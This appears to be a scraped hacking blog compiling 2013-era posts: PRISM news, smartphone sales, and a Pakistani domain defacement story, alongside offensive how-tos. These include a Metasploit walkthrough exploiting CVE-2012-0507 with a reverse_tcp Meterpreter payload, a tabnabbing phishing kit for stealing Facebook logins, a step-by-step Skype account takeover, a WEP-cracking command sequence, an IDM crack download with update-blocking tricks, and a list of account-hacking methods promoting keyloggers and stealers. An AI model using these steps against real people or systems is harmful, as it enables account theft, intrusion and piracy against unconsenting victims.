US Govt is Watching Your Emails, Images, Videos, Search History, Skype Calls, Files, Chats

There are chances that you might have thought of being watched by US government through Gmail, Facebook and other internet giants who are holding your sensitive and most private data.
The news is that all your fears were real, as a new secret document has proven the existence of a US government program that grants NSA (National Security Agency) and FBI the direct access to the servers of Google, Facebook, Microsoft, Skype, Yahoo, Apple and other internet companies, from where they can extract any user information at their will.
Named as PRISM, the program was sanctioned by President Bush in 2007, which is now renewed again by President Obama in December 2012.
Under this program, tech giants gave the direct access to its servers to US government agencies, through which they can grab any information they want, without any hurdle.
The information that NSA can access may include your emails, chats, search history, images, videos, skype calls (even the content of skype calls), YouTube videos (even those which are private), files that are stored in your computer, call records of your smartphones, SMS, MMS, places you visit and much more.
Microsoft joined this program before anyone, followed by Yahoo and Google. Facebook, Skype, Youtube, AOL and Apple are also the program partners who have given the direct access and they can obtain information of any kind for any user who uses these services.
Dropbox is likely to be added in the list of partner companies soon.

PRISM enables US government agencies to reach directly into the servers of the participating companies and obtain both stored communications as well as perform real-time collection on targeted users.
Interestingly, US agencies call PRISM “one of the most valuable, unique and productive accesses for NSA”.
Another fact, which may worry our local “Privacy and Internet Freedom Activists” to a greater level is that Pakistan is second largest spying target of NSA, after Iran. Over 13.5 billion reports were gathered from Pakistan in March 2013 only.
Given the amount of data we share with these companies, including our personal and private information, this revelation is alarming and raise countless serious questions, concerning the morality of tech companies and US government.

Hackers Can Access Your Mobile Using VIBER

Security experts has found a way to gain full access to Android phones using the popular messaging application "VIBER", where it just needs two phones, both running Viber, and a mobile number.

How it works. The victim phone is locked, but it has Viber installed and set up. The attacker phone sends a message to the victim, which brings up an alert window on the lockscreen. One of the unique features of Viber is that you can respond even while the phone is locked, and activating the Viber keyboard is the next step in the attack. Once the keyboard is active on the victim phone, the attacker sends another message. This time, press the back button on the victim phone, and suddenly you have full access to the victim phone.

This exploit recquires two things that most attackers don't have.

1) An attacker need physical access to your phone. Without your phone, it wouldn't matter if it was locked or unlocked since the attacker couldn't do anything.

2) An attacker would need to have your Viber user information to send you a message. Even if your phone was stolen and the attacker somehow knew that you were a Viber user, they'd still need to send your specific phone a message.

A patch to this Exploit has been released. update your android, before other invade it.

How To Earn Money Online : Guaranty $100 For One Article

Everyone wants to earn money , irrespective of work , Some earn money while doing work offline some from their website etc , there are many ways to earn money which varies according to individuals condition.
I was searching effective ways to earn money online and i found something very interesting and real, out of many fake internet sites and ideas , i found this idea best among all .
Found out to be true that we can earn 100 dollars for one article with a bit of terms and condition but they are logical.
How do we do it ?
Yes the question is how do we earn money , its very simple you just have to write a article .
Its not that simple as it sounds , 100 dollar for one article means you have to do smart work , yes you have to write about very unique 10 things which you think suits the tittle top 10 , for example “Top 10 weird restaurants ”   with their images and proof of their existence, proof can be the url of the link from where you got that information .

Where to submit the article and its proof ?

You have to submit your article and valid information as per requirement to www.listverse.com . listverse.com is the site about top list of everything in this world , they accept article from every deserving person and pay them 100 dollars for a single article . They are creative and combine top existing similar things around the globe in one article with complete details and share them with the whole world on their website. To achieve the goal of covering every thing they even pay for the knowledge and creativity to those who have different ideas.
For more rules and regulation of listverse.com click here
How do we earn money ?
If your submitted information found out to be original and valid on internet then listverse.com pays you $100 dollars via paypal to your account to publish that article on their website .
Isn’t it interesting that you have to use a bit of your brain and you can earn $100 for one article .
Those who are creative and innovative can at least try and can have a chance to win 100 dollars. make sure before submitting your article that you should have paypal account .

How to Hack Remote Computer using Metasploit by exploiting Java Vulnerability

On this post  i am going to demonstrate how to use the Metasploit tool to exploit the popular java AtomicReferenceArray Type Violation vulnerability(CVE-2012-0507).

Requirements:

VirtualBox
Target OS(windows,...)
PenTesting Distro(Backtrack )
JRE 6(unpatched version)

I am assuming you already know how to set up virtual machines and how to install backtrack etc

Part I: Preparing the Target Machine:
Start the "Target" Machine.
Install the JRE 6.

Part II: Preparing the PenTesting Machine:
Now, start the BT5.

Open the Terminal and Type "msfupdate". This will update the Metasploit Framework(MSF) with the latest exploits and Payloads. As CVE-2012-0507 is latest vulnerability, you have to update the MSF before proceeding further.

Part III :
Exploiting the Java AtomicReferenceArray Type Violation Vulnerability:

Step 1:
Open the Terminal and type "msfconsole". This will bring the Metasploit console , here you can interact with the MSF.

Step 2:
Type "use exploit/multi/browser/java_atomicreferencearray" . This command will use the java_atomicreferencearray.rb module for the attack.

Now type "show options" to display the which settings are available and/or required for this specific module.

Then type "set SRVPORT 80".
and "set URIPATH /".

Step 3: Set Payload
Type "show payloads", this will displays the list of payloads. We are going to use the 'reverse_tcp' payload. This payload will get reverse tcp connection from the Target to PenTesting machine.

Type 'set payload java/meterpreter/reverse_tcp' in the console.

set LHOST [IP_address] : In order to get reverse connection, we have to set our IP in the LHOST.

open the Terminal and type "ifconfig". This will display the IP info of our PenTesting Machine. The IP will be "192.168.56.x". E.g, let me say the ip is 192.168.56.10.

Now Type in the msfconsole as "set LHOST 192.168.56.10".

Part IV: Breaching the Target Machine:

So , are you ready?! Let us break into the Target Machine.

Step 1:
Type "exploit" in the msfconsole. This will start the reverse handler to our Machine and it will wait anyone that will connect to the our HTTP server (Eg: http://192.168.56.10/). Once victim connect to our server, it will send a jar will that will exploit the CVE-2012-0507 vulnerability.

step 2:

Open the Firefox/IE in the Target machine.
Enter "http://192.168.56.10/".
It loads nothing but exploit will run in the background.
Step 3:
Open the BT5 machine,

Now type "sessions", this will show the list of active sessions .

Type "sessions -i 1", this will open the connection to the session with the id '1' and bring you to Meterpreter. Meterpreter will help you to interact/control with the Target.

Step 4:Upload files
We got backdoor to the Target machine :) , now we can run any commands in the Target.

For Example, Typing 'sysinfo' will display the system information.

You can also upload and execute your own executable files in the Target machine.

'upload /Test.exe c:\\", this command will upload the Test.exe from the root('file system' dir) folder of the BT5 to the C drive of the Target.

'execute -f C:\\Test.exe", this command will run our uploaded File in the Target.

There you have it.. Now you are in the remote computer and you can do pretty much anything :)

How To Hack Facebook Accounts By Tabnabbing

Phishing is the simplest way that you can use to hack Face book ,GMail accounts or any other email account, In this article I'll teach how you can use Tabnabbing (an advanced phishing technique) to hack Facebook accounts ,If your new to phishing or you don't know what tabnabbing is ,then i would strongly suggest you to read the following articles before reading this one

• What is Phishing 
• Tabnabbing - A New Type of Phishing Attack

Hack Facebook Accounts By Tabnabbing 

Tab-nabbing is an advanced  Phishing technique .it requires a lot of coding to be done ,But i have tried to keep it as simple as possible hope you like the following tutorial

Requirements 

1. You should know how Phishing , Tabnabbing works  if not read the following articles

1. What is Phishing 
2. Hack Facebook accounts by Phishing 
3. Tabnabbing - A New Type of Phishing Attack

2. A Free Web Hosting Account - You can use110mb.com or ripway.com


3. You should have the following files which are required for tabnabbing   

1. Facebook.html  -Fake Facebook login page (phisher) 
2. login.php - Script which captures the login details of the victim
3. google.html - Standard google page used to trick the user
4. tabnabb.js - Java script which is required for tabnabbing

You can download all the files from Here  & to get the password Click Here


Procedure 
1. First a fall  download all  the files and extract them using winrar or win-zip , Then upload  facebook.html ,login.php & google.html to your free web webhosting account

2. Now open tabnabb.js using a notepad , Search for "Enter your URL here" , Now replace it with your "Facebook.html" url which you uploaded in the previous step, finally save it and upload  tabnabb.js to your hosting account

3. By now you should have successfully uploaded all the four files to your hosting account as shown

4. Now to check whether the hack is working, click on the google.html link and open it , Now open few new tabs , After some time you will see google page switched to your fake Facebook page

5. Now once the victim enters all his credentials in our fake facebook login page and clicks login, he will be redirected to Facebook.com/careers  page to avoid suspecion

6. To see the victim login details go to your hosting account where you will see a new file "log.txt" Open it to see the victims user-id and password

Read more: http://www.101hacker.com/2011/08/how-to-hack-facebook-accounts-by.html#ixzz2M57qA4Fu

Download IDM Latest 2013 Full Version Registered Crack + Patch + Keygen

Internet download manager is one of the most popular and the best download manager tool. Most of we prefer IDM for our downloading purpose because of it’s awesome features. But this useful application is not free, we have to pay and buy this application. It comes with 1 month trial period and after the validity ends you have to buy this application. Most of we use patches and cracked version of IDM, but we don’t think that most of the patches or cracked software may contain virus. So here I will describe you how to crack IDM manually so that you will be safe from possible virus attack and also you will get lifetime validity on your IDM. When we update IDM it shows that IDM is registered with fake serial number but IDM exists, then it will stop downloading. By using this trick your IDM is registered for life time and you will not get any error while updating next time.

Download Here

http://www.4shared.com/get/stZ-9bpT/DM14.html

Trick to Disable Automatic update of IDM

Hi friends,

Even though its  not so easy to  stop the update of idm  gradually ,lets give a try

Here is trick to disable automatic update of IDM   

Solution 1

Its   a much more effective way of stopping the update checks, you will need to open up regedit (there is no need to run as administrator) and go to the following key:

1 HKEY_CURRENT_USER\Software\DownloadManager
and then change the “LastCheck” and/or “LastTry” value to something like e.g.:

1 [10/22/15]
Then restart your computer !!


Solution 2
You can setup your firewall to block this IP on ALL ports: 174.133.70.198 AND 174.133.70.98 AND this Host: star.tonec.com
then it won't be able to access it's update server

Hack any skype account in 6 easy steps

Major vulnerability of Skype's password reset system has went public today.
The only thing you need to obtain full access to any Skype account is primary email of that account (the email which used when the Skype account been registered).
Following guide contains both - how to steal an account, and how to protect your account (scroll down for that).

Update 1 (November 14, 2:00am PDT): Skype made the password reset system disabled. So link on the step 4 is not working for me now (starting from November 14, 2 am PDT).
Update 2 (November 14, 6:00am PDT): Skype re-enabled the password reset system, but now it will not sent recovery token to attacker's client. The hole (gate, almost highway road) is closed.

For example, I know somebody's email - crackme33@yahoo.com , let's hack his Skype!

1. Go to the Skype website, register new disposable account. In email field, put target's email.

 

If the email, you typed into form, attached to some skype account, then it will say that "You already have a Skype account", that means you can hack it!

So, complete the form, provide some fake BOD, gender, country, answer to question "How do you intend to use Skype?" as personal, fill any skype name (REMEMBER IT), it will give you some suggestions of not taken ones, assign some password  (REMEMBER IT), solve the captcha, proceed forward - push the continue button. 

You will be redirected to you new account dashboard. Logout from it.

 

2. Run the Skype application with those new credentials.

3. Since we just logged in to a fresh account, at home screen of the Skype application, there will be advertisement "Find your friends and say hello", click somewhere to bring focus on that part of screen (I clicked where the red cross is drawn):

Then push F5 button on your keyboard, it will refresh the home screen. Do that 3-4 times until you see "Bring your Facebook friends into Skype" advertisement. Click "No thanks, blah-blah-blah".

You will get the home screen with some banner. 

4. Go to Skype's password reset system.Put the target's email. In my case - crackme33@yahoo.com .

Click "Submit button", and after several seconds, you will see Skype's pop-up notification - "Password token".

5. Go to Skype application, on the home screen you will see Password token, click on "more info", go to "temporary code link":

6. Browser will open page, where you can select any skype account registered to target email, in my case there are two account - my disposable and target:

Choose target's account and click "Change password and sign me in":

 You will be redirected to login form:






You are all set!
P.S. I have changed primary email for that test accounts, so do not try hack them. Just in case. =)

How to protect your accounts

You already changed password for the target account, know the skype login, and able to use that target skype account. But somebody could take it back from you, just as you did (owner for example).
To prevent that you need to change your primary email to some address, unknown to anyone.

To do that:
1. Sign in on skype website.
2. Go into the "profile" link (click to enlarge):

3. On account information, go down, to "Contact details", click "Add email address":

4. Add your email address, which unknown to anybody, but you:

Click save button at the bottom of the form. After page reload, refresh page again to prevent some strange glitches of the site (if you will not reload the page, after you do following steps, it will forget steps 4 and 5 and discard that little work).

5. Scroll to Contact details again. Click on "Add email address" again. Switch primary email to the new one:

Click "Save" button at the bottom of the form, again.

It will ask you for your password. You know it already. Type password and click button by mouse, not by "Enter" key.

After page reload, refresh page again to prevent some strange glitches of the site (described above).

6. Scroll to Contact details again. Click on "Add email address" again. Delete (with backspace and/or delete buttons) all emails but primary:

7. Click "Save" button at the bottom of the form. Make sure all your changes applied (it sometimes require two or more attempts, since the site is developed by curly-handed programmers).

8. Tell to friends how to protect a skype account. ASAP

At the time there is no other way to protect your skype account, except changing of primary email to some unknown address.
Once account is stolen, it has ability to retrieve all your IM history from other peers.
If you already lost your account, contact to all your necessary contacts and tell them to remove you from their contact list. It prevents IM history interchange (if it is not already happened).

There is how mailbox of target looks like:



Thus target will receive notifications regarding password change, but initial owner have less than one minute to understand and take action, it is almost impossible to login into skype website, change emails, when a hacker already there.

Disclaimer: The information provided on in this blog is to be used for educational purposes only. The blog author is in no way responsible for any misuse of the information provided.

How to Find who unfriends You in Facebook

First go to: http://www.outandin.info/ 
 and click “Login with Facebook”

 

7 Ways To Speed Up Windows 7

 7 Ways to Speed Up Windows 7

With the release of Windows 7, Microsoft may just have introduced the fastest operating system in the world. For those speed junkies who are never satisfied, we have provided a few tips that will help you make your PC even faster.

Disable Automatic Disk Defragmentation

The Automatic Disk Defragmentation feature in Windows is designed to maintain the health of the operating system. However, it also makes Windows run a little slower. You can put an end to this by disabling the feature and manually running at your leisure. To do so, click “Start” and select “Computer.” Next, right click on your primary hard drive and select “Properties.” Lastly, select the “Tools” tab, click “Defragment Now” and uncheck the “Run on a schedule” option.

Utilize ReadyBoost

ReadyBoost is a built-in Windows 7 feature that allows you to use a USB flash drive to enhance system performance. How is this possible? The drive itself acts as additional computer memory!
In order to make use of this feature, you will need a USB drive with at least 2 GB of space. From there, you simply connect the drive to your computer, click “Start” and select “Computer.” Next, click on the USB drive and select “ReadyBoost.” Lastly, select “Use this device” and choose as much capacity as possible below on the “Space to reserve for system speed” slide.

Disable Windows Transparency

The transparency of windows is a great perk from a presentation aspect, but this may not be the case for those with older hardware as it can drastically impact performance. The good thing is that transparency can be disabled with ease. Simply right-click on your desktop, select “Personalize,” choose the active theme and then navigate to “Windows Color.” Finally, uncheck the “Enable Transparency” option.

Disable Unwanted Features

There may be numerous Windows 7 features that you really don’t need. These same features could also slow down your computer. To disable them, click on “Start,” choose “Control Panel” and then select “Programs and features.” Next, select the “Turn Windows features on or off” option, navigate through the list and uncheck all the features you want to disable. Once you are done, simply click “OK” to remove those features.

Disable Startup Services

Startup services are notorious for slowing down performance in XP and Vista. The same holds true for Windows 7. You can disable unwanted services by hitting “Start,” typing “msconfig” in the search bar and clicking “Enter.” Click the “Services Tab” on the next window and deselect the services you do not want to automatically run at startup. While this all depends on preference, services that impact performance the most include “Offline Files,” “Tablet PC Input Services,” Terminal Services,” “Fax” and “Windows Search.”

Disable Minimizing/Maximizing Animations

Many users have already fallen in love with the minimizing and maximizing animation effects of windows. However, some may find it irritating after a while as it can eventually lead to slowdowns. If you want to disable this function, hit “Start,” enter “System Properties Performance” in the search bar and click “OK.” On the next screen, deselect the “Animate window when minimizing and maximizing” option and click “OK.”

Update Your Windows 7 Drivers

Lastly, ensure that you have the latest device drivers made specifically for Windows 7. Since your PC can have hundreds of drivers installed in it at any given time, this task can be tedious. Luckily there are 3rd party utilities out thee such as DriverFinder™, which can greatly speed up this process.

Simple Wi-Fi WEP Crack [TUTORIAL]

Overview

To crack the WEP key for an access point, we need to gather lots of initialization vectors (IVs). Normal network traffic does not typically generate these IVs very quickly. Theoretically, if you are patient, you can gather sufficient IVs to crack the WEP key by simply listening to the network traffic and saving them. Since none of us are patient, we use a technique called injection to speed up the process. Injection involves having the access point (AP) resend selected packets over and over very rapidly. This allows us to capture a large number of IVs in a short period of time.

Equipments used

Wifi Adaptor : Alfa AWUS036H (available on eBay & Amazon)
Software : Backtrack 4 (Free download from http://www.backtrack-linux.org)

Step 1 – Start the wireless interface in monitor mode on AP channel

airmon-ng start wlan1 6

starts wifi interface in channel 6

Step 2 – Test Wireless Device Packet Injection

aireplay-ng -6 -e infosec -a 00:1B:11:24:27:2E  wlan1

-9 means injection

-a 00:1B:11:24:27:2E is the access point MAC address

Step 3 – Start airodump-ng to capture the IVs

airodump-ng -c 6 –bssid 00:1B:11:24:27:2E -w output wlan1

Step 4 – Use aireplay-ng to do a fake authentication with the access point

In order for an access point to accept a packet, the source MAC address must already be associated. If the source MAC address you are injecting is not associated then the AP ignores the packet and sends out a “DeAuthentication” packet in cleartext. In this state, no new IVs are created because the AP is ignoring all the injected packets.

aireplay-ng -1 0 -e infosec -a 00:1B:11:24:27:2E -h 00:c0:ca:27:e5:6a wlan1

-1 means fake authentication

0 reassociation timing in seconds

-e infosec is the wireless network name

-a 00:14:6C:7E:40:80 is the access point MAC address

-h 00:0F:B5:88:AC:82 is our card MAC address

OR

aireplay-ng -1 2 -o 1 -q 10 -e infosec -a 00:1B:11:24:27:2E -h 00:c0:ca:27:e5:6a wlan1

2 – Reauthenticate every 2 seconds.

-o 1 – Send only one set of packets at a time. Default is multiple and this confuses some APs.

-q 10 – Send keep alive packets every 10 seconds.

Troubleshooting Tips

Some access points are configured to only allow selected MAC addresses to associate and connect. If this is the case, you will not be able to successfully do fake authentication unless you know one of the MAC addresses on the allowed list. If you suspect this is the problem, use the following command while trying to do fake authentication. Start another session and…

Run: tcpdump -n -vvv -s0 -e -i | grep -i -E ”(RA:|Authentication|ssoc)”

You would then look for error messages.

If at any time you wish to confirm you are properly associated is to use tcpdump and look at the packets. Start another session and…

Run: “tcpdump -n -e -s0 -vvv -i wlan1”

Here is a typical tcpdump error message you are looking for:

11:04:34.360700 314us BSSID:00:14:6c:7e:40:80 DA:00:0F:B5:88:AC:82 SA:00:14:6c:7e:40:80   DeAuthentication: Class 3 frame received from nonassociated station

Notice that the access point (00:14:6c:7e:40:80) is telling the source (00:0F:B5:88:AC:82) you are not associated. Meaning, the AP will not process or accept the injected packets.

If you want to select only the DeAuth packets with tcpdump then you can use: “tcpdump -n -e -s0 -vvv -i wlan1 | grep -i DeAuth”. You may need to tweak the phrase “DeAuth” to pick out the exact packets you want.

Step 5 – Start aireplay-ng in ARP request replay mode

aireplay-ng -3 -b 00:1B:11:24:27:2E -h 00:c0:ca:27:e5:6a wlan1

Step 6 – Run aircrack-ng to obtain the WEP key

aircrack-ng -b 00:1B:11:24:27:2E output*.cap

iPhone Ends 2012 on a High, Becomes the Top-Selling Smartphone

And here’s a company which finds success in defeats too. Apple, the manufacturer which is currently getting a bit unpopular among hardcore smartphone users nowadays is seeing its two iPhone models, the iPhone 5 and 4S become the most sold smartphones in the last quarter of 2012. Both the phones captured 12.6 and 8 percent market-shares respectively. That’s more than Samsung’s Galaxy S III flagship which scored 7.1 percent market share in the same quarter.
The sales of the iPhone 5 and 4S were 27.4 and 17.4 million respectively, compared to the 15.4 million of Galaxy S III.

These were, infact, the numbers which were achieved by the predecessors of these smartphones over a time period of a lot of months, years even.
The sales of the Samsung smartphone may have been down due to the ever-increasing rumours surrounding its next flagship which will most-probably be revealed next month. It’s interesting to see that more than a year old iPhone 4S earned a high market-share too, despite being ridiculed in its first few months.
The success can be attributed to the fact that its price has dropped quite much since its launch and also because of it getting the latest iOS 6 update just like its predecessors about time as well.
The success of the iPhone 5 wasn’t any surprise though as 5 million units was the number of iPhone 5s sold by Apple in the launching weekend. It will be interesting too see however, which way this number will go in the coming months with the launch of the Samsung Galaxy S IV, among other smartphones.

Pakistan Hacker Explains How Pakistan google and other sites got hacked

Boolean Based SQL Injection vulnerability

Recently, The news about the Pakistani Google hack spread like a wildfire in the Internet.  At the time, Top Level Pakistan Domains displayed the defacement page including Yahoo, MSN, HSBC, EBay,Paypal and more sites.

Today, khanisgr8, a hacker from Pakistan hacker collective called "TeamBlackHats" sent an email regarding the security breach.  He explains how those websites got hacked by Turkish Hacker group "EBoz".

The day before yesterday we mentioned those hacked sites' dns records points to different free hosting site. Also we report that the site might be hacked using PKNIC vulnerability.

PKNIC is responsible for the administration of the .PK domain name space, including the operation of the DNS for the Root-Servers for .PK domains,
and registration and maintenance of all .PK domain names. PKNIC is operated as a self-supporting organization.

The hackers have claimed to have discovered a Boolean-based blind SQL injection, persistent cross site scripting, sensitive directory directory disclosure vulnerabilities in the official website of PKNIC.

They provide us the vulnerable link with POC to exploit it. Also they sent some data compromised using the vulnerability which contains database details, username and hashed password.

Xss vulnerability

He also provide the screenshot of the Cross site scripting vulnerability. When i tried to verify the XSS vulnerability, i just searched in google for the url and visit a PKNIC link.  After visiting the link, i just saw a text "<script>alert("HACKED BY COde InjectOr")</script>". May be Code Injector team attempts to exploit the vulnerability.  

"Apparently Google Pakistan has been defaced by a Turkish Hacker group 'Eboz' . It's still quite hard to believe that Google server has been hacked. They really need to put a lot of focus on their defenses because if one website got hacked that means every other websites can be hacked. " they said.

We have sent an email to PKNIC regarding the vulnerability and waiting for their response. We are not sure whether the vulnerability is fixed or not So we are not providing the vulnerable link here.

How to Show Who Is Online On Facebook While You Are Offline Mode

First you will go to the login the Facebook after you can go the offline chat in Facebook account.
Go to http://www.facebook.com/onlinenow page.

Click on Allow

After install this application you able to show, who is online on Facebook while you are offline on Facebook account.  

Facebook Hacking Book

 

Download

Top 10 Ways How Hackers Can Hack Facebook Accounts In 2013

Facebook is one of the most widely used social networking site with more than 750 million users, as a reason if which it has become the number 1 target of hackers, I have written a couple of post related to facebook hacking, I mentioned the top methods which were used by hackers to hack facebook accounts, however lots of things have changed in 2012, Lots of methods have went outdated or have been patched up by facebook and lots of new methods have been introduced, So in this post I will write the top 10 methods how hackers can hack facebook accounts in 2011.

10 Ways How Hackers Can Hack Facebook Accounts In 2011

So here are the top 10 methods which have been the most popular in 2011:

1. Facebook Phishing 

Phishing still is the most popular attack vector used for hacking facebook accounts, There are variety of methods to carry out phishing attack, In a simple phishing attacks a hacker creates a fake login page which exactly looks like the real facebook page and then asks the victim to login into that page, Once the victim logins through the fake page the victims "Email Address" and "Password" is stored in to a text file, The hacker then downloads the text file and get's his hands on the victims credentials.

2. Keylogging 

Keylogging, according to me is the easiest way to hack a facebook password, Keylogging sometimes can be so dangerous that even a person with good knowledge of computers can fall for it. A keylogger is basically a small program which once is installed on victims computer will record every thing which victim types on his/her computer. The logs are then send back to the attacker by either FTP or directly to hackers email address. I have dedicated a half of my newsest book "An introduction to keyloggers, RATS And Malware" to this topic.

3. Stealers 

Almost 80% percent people use stored passwords in their browser to access the facebook, This is is quite convenient but can sometimes be extremely dangerous, Stealers are software's specially designed to capture the saved passwords stored in the victims browser, Stealers once FUD can be extremely powerful. If you want to how stealers work and how you can set up your own one?, Kindly refer the book above.

4. Session Hijacking

Session Hijacking can be often very dangerous if you are accessing Facebook on a http:// connection, In a Session Hijacking attack a hacker steals the victims browser cookie which is used to authenticate a user on a website and uses to it to access victims account, Session hijacking is widely used on Lan's. I have already written a three part series on How session hijacking works? and also a separate post on Facebook session hijacking.

Further Information

• Gmail Cookie Stealing And Session Hijacking Part 
• Gmail Cookie Stealing And Session Hijacking Part 2
• Gmail Cookie Stealing And Session Hijacking Part 
• Facebook Session Hijacking Attack(Recommended)

5. Sidejacking With Firesheep

Sidejacking attack went common in late 2010, however it's still popular now a days, Firesheep is widely used to carry out sidejacking attacks, Firesheep only works when the attacker and victim is on the same wifi network. A sidejacking attack is basically another name for http session hijacking, but it's more targeted towards wifi users.

To know more about sidejacking attack and firesheep, read the post mentioned below:

• Firesheep Makes Facebook Hacking Easy

6. Mobile Phone Hacking

Millions of Facebook users access Facebook through their mobile phones. In case the hacker can gain access to the victims mobile phone then he can probably gain access to his/her Facebook account. Their are lots of Mobile Spying softwares used to monitor a Cellphone.

The most popular Mobile Phone Spying softwares are:

1. Mobile Spy
2. Spy Phone Gold

7. DNS Spoofing 


If both the victim and attacker are on the same network, an attacker can use a DNS spoofing attack and change the original facebook.com page to his own fake page and hence can get access to victims facebook account.

8. USB Hacking 

If an attacker has physical access to your computer, he could just insert a USB programmed with a function to automatically extract saved passwords in the browser, I have also posted related to this attack which you can read by accessing the link below:

• Usb password stealer To Hack Facebook Passwords

9. Man In the Middle Attacks


If the victim and attacker are on the same lan and on a switch based network, A hacker can place himself b/w the client and the server or he could also act as a default gateway and hence capturing all the traffic in between, ARP Poisoning which is the other name for man in the middle attacks is a very broad topic and is beyond the scope of this article, We have written a couple of articles on man in the middle attacks which canb be accessed from the links mentioned below:

• Man In the Middle Attacks With SSL Strip

If you are really interested in learning how man in the middle attacks, you can view the presentation below by oxid.it.

10. Botnets 

Botnets are not commonly used for hacking facebook accounts, because of it's high setup costs, They are used to carry more advanced attacks, A botnet is basically a collection of compromised computer, The infection process is same as the keylogging, however a botnet gives you, additional options in for carrying out attacks with the compromised computer. Some of the most popular botnets include Spyeye and Zeus.